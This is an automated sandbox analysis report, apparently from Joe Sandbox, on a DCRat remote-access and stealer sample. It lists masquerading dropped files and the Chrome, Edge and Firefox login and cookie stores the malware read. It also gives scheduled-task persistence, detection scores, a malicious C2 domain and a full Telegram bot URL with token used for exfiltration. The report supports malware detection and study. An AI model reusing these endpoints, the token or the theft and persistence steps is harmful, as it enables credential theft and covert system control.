                                    Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-US\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal

                                    Remote Access Functionality

Source: Yara match File source: 5.2.fontdrvhost.exe.128bc1d8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 3084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AdbXCBUViTnoVBSsOq.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: eP6sjvTqJa.exe, type: SAMPLE
Source: Yara match File source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.fontdrvhost.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2110949935.0000000006C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\backgroundTaskHost.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Internet Explorer\en-US\conhost.exe, type: DROPPED
Source: Yara match File source: C:\Drivers\fontdrvhost.exe, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 137 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | Login Hook | Login Hook | 13 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 243 Masquerading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 11 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

Behavior Graph ID: 1583030, Sample: eP6sjvTqJa.exe, Startdate: 01/01/2025, Architecture: WINDOWS, Score: 100 (graph not shown)

| Source | Detection | Scanner | Label |
|---|---|---|---|
| eP6sjvTqJa.exe | 60% | Virustotal | |
| eP6sjvTqJa.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| eP6sjvTqJa.exe | 100% | Avira | VBS/Runner.VPG |
| eP6sjvTqJa.exe | 100% | Joe Sandbox ML | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat | 100% | Avira | BAT/Delbat.C |
| C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\backgroundTaskHost.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\Desktop\PjHeJXVW.log | 100% | Avira | TR/AVI.Agent.updqb |
| C:\Drivers\fontdrvhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Program Files\Internet Explorer\en-US\conhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\Desktop\lNXiOOwv.log | 100% | Avira | TR/PSW.Agent.qngqt |
| C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe | 100% | Avira | VBS/Runner.VPG |
| C:\Users\user\Desktop\rfCzNWvT.log | 100% | Avira | TR/PSW.Agent.qngqt |
| C:\Users\user\Desktop\beESemrN.log | 100% | Avira | TR/AVI.Agent.updqb |
| C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\backgroundTaskHost.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\JRcNKQWy.log | 100% | Joe Sandbox ML | |
| C:\Drivers\fontdrvhost.exe | 100% | Joe Sandbox ML | |
| C:\Program Files\Internet Explorer\en-US\conhost.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\UXZdmUkL.log | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\lNXiOOwv.log | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\rWShinUN.log | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\rfCzNWvT.log | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\rFAHquBj.log | 100% | Joe Sandbox ML | |
| C:\Drivers\fontdrvhost.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Program Files\Internet Explorer\en-US\conhost.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\Default\AppData\Local\Microsoft\Windows\History\AdbXCBUViTnoVBSsOq.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\BoUXaXGR.log | 4% | ReversingLabs | |
| C:\Users\user\Desktop\JRcNKQWy.log | 9% | ReversingLabs | |
| C:\Users\user\Desktop\LtQnCbUd.log | 4% | ReversingLabs | |
| C:\Users\user\Desktop\OwXMDaSq.log | 25% | ReversingLabs | |
| C:\Users\user\Desktop\PjHeJXVW.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\SvkCuJlg.log | 3% | ReversingLabs | |
| C:\Users\user\Desktop\UXZdmUkL.log | 9% | ReversingLabs | |
| C:\Users\user\Desktop\beESemrN.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\crKSmbgv.log | 25% | ReversingLabs | |
| C:\Users\user\Desktop\lNXiOOwv.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\rFAHquBj.log | 8% | ReversingLabs | |
| C:\Users\user\Desktop\rWShinUN.log | 8% | ReversingLabs | |
| C:\Users\user\Desktop\rfCzNWvT.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\uNJXqjUH.log | 3% | ReversingLabs | |
| C:\Users\user\backgroundTaskHost.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |

                                    No Antivirus matches
                                    No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://250345cm.renyash.ru/sqltemp.php | 100% | Avira URL Cloud | malware |
| http://250345cm.reP2y | 0% | Avira URL Cloud | safe |
| http://250345cm.renyash.ru/ | 100% | Avira URL Cloud | malware |
| http://250345cm.renyash.ruve | 0% | Avira URL Cloud | safe |
| http://250345cm.reP | 0% | Avira URL Cloud | safe |
| http://250345cm.renyash.ru | 100% | Avira URL Cloud | malware |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| ipinfo.io | 34.117.59.81 | true | false | | high |
| api.telegram.org | 149.154.167.220 | true | false | | high |
| 250345cm.renyash.ru | 104.21.38.84 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto | false | | high |
| http://250345cm.renyash.ru/sqltemp.php | true | Avira URL Cloud: malware | unknown |
| https://ipinfo.io/country | false | | high |
| https://ipinfo.io/ip | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://250345cm.renyash.ru | AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://duckduckgo.com/chrome_newtab | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| https://duckduckgo.com/ac/?q= | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| https://api.telegram.org | fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/images/branding/product/ico/googleg_lodp.ico | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| https://api.telegram.org/bot | fontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.dr | false | | high |
| http://ipinfo.io | fontdrvhost.exe, 00000005.00000002.2218593117.00000000030FE000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://250345cm.renyash.ru/ | AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://250345cm.renyash.ruve | AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| https://www.ecosia.org/newtab/ | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| http://250345cm.reP2y | AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 4lvmN5MENl.24.dr | false | | high |
| https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX | fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://support.mozilla.org/products/firefox | AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ipinfo.io | fontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ac.ecosia.org/autocomplete?q= | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt | 4lvmN5MENl.24.dr | false | | high |
| http://250345cm.reP | AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |
| https://support.mozilla.org | 4lvmN5MENl.24.dr | false | | high |
| http://api.telegram.org | fontdrvhost.exe, 00000005.00000002.2218593117.0000000002E30000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | VHGrIJe2oz.24.dr, EwZcSaKyVq.24.dr | false | | high |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false |
| 104.21.38.84 | 250345cm.renyash.ru | United States | 13335 | CLOUDFLARENETUS | true |
| 34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583030
Start date and time: 2025-01-01 16:01:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: eP6sjvTqJa.exe
renamed because original name is a hash value
Original Sample Name: f0944c44a97161524ce95c9f8a2629f9.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@40/51@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 28.6%
                                                                                        HCA Information:Failed
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 172.202.163.200
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target AdbXCBUViTnoVBSsOq.exe, PID 1016 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 3084 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 4328 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 6528 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 7192 because it is empty
                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:02:08 | API Interceptor | 30x Sleep call for process: fontdrvhost.exe modified
10:02:15 | API Interceptor | 13207490x Sleep call for process: AdbXCBUViTnoVBSsOq.exe modified
16:02:07 | Task Scheduler | Run new task: AdbXCBUViTnoVBSsOq path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
16:02:08 | Task Scheduler | Run new task: AdbXCBUViTnoVBSsOqA path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
16:02:08 | Task Scheduler | Run new task: backgroundTaskHost path: "C:\Users\user\backgroundTaskHost.exe"
16:02:08 | Task Scheduler | Run new task: backgroundTaskHostb path: "C:\Users\user\backgroundTaskHost.exe"
16:02:08 | Task Scheduler | Run new task: conhost path: "C:\Program Files\Internet Explorer\en-US\conhost.exe"
16:02:08 | Task Scheduler | Run new task: conhostc path: "C:\Program Files\Internet Explorer\en-US\conhost.exe"
16:02:08 | Task Scheduler | Run new task: fontdrvhost path: "C:\Drivers\fontdrvhost.exe"
16:02:08 | Task Scheduler | Run new task: fontdrvhostf path: "C:\Drivers\fontdrvhost.exe"
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| C:\Drivers\fontdrvhost.exe | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Program Files\Internet Explorer\en-US\conhost.exe | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (543), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):543
                                                                                                                  Entropy (8bit):5.876513737259657
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:gI1lhokNFvEE+AA+RQjfzA7qcE0j8RQYXHCoXAHYsuWgsHM0FGB3x:gmEEjdQjf4qSMNZ+5uWg6rWx
                                                                                                                  MD5:4FADCE842D493D7F68C432C0451BA94E
                                                                                                                  SHA1:7739F32269FA6F6374C442F1A181B6F6F909E1B6
                                                                                                                  SHA-256:6AF5D7A337E9BDB06C17EEC0E69BA222F92F8C85D0BC6B4B86A68408AA74D887
                                                                                                                  SHA-512:B45F7D134214413DC58109348BCE7FDFE7DEBB430B514DF66E4FB515E857E519E5661A57EFBD2DCA23F9BDB5720A80FDD6E5B6DD48793A57254AE2C9137CD15E
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):96
                                                                                                                  Entropy (8bit):5.062950688862252
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:wBRC2Z7a71T2ExiST6XILRFWCNRcmA:wPIB2NST8IlFBumA
                                                                                                                  MD5:4CA51D230B98301363F779FBD2FD796C
                                                                                                                  SHA1:CF13C37E94C171FD4853A60F7509A61FFF48BEA4
                                                                                                                  SHA-256:95F47FE6CE9F000C06F234C0B523E7726C02214C008BAFE9B53A3DD3FAB9C1DE
                                                                                                                  SHA-512:88C214A6D3E822138C3CD611CB8E09F15B4F17BADBEC1773C743F8D9AAF81F5B1A59229C2FFB6725978A01A4A1227DBE0BB29A8D8D75939096116D340A73712D
                                                                                                                  Malicious:false
                                                                                                                  Preview:%pdlzgHLbolS%%OXkQthmtDlsaCb%..%VTkRatou%"%SystemDrive%\/Drivers/fontdrvhost.exe"%vkfbTXKadaRJC%
                                                                                                                  Process:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
